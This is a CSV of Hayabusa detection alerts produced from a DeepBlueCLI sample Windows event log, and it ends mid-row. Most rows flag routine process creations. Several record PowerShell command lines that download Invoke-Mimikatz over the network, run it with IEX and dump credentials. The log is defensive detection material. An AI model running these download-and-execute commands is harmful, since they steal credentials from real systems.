2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:00.792 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: 
C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | 
LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 
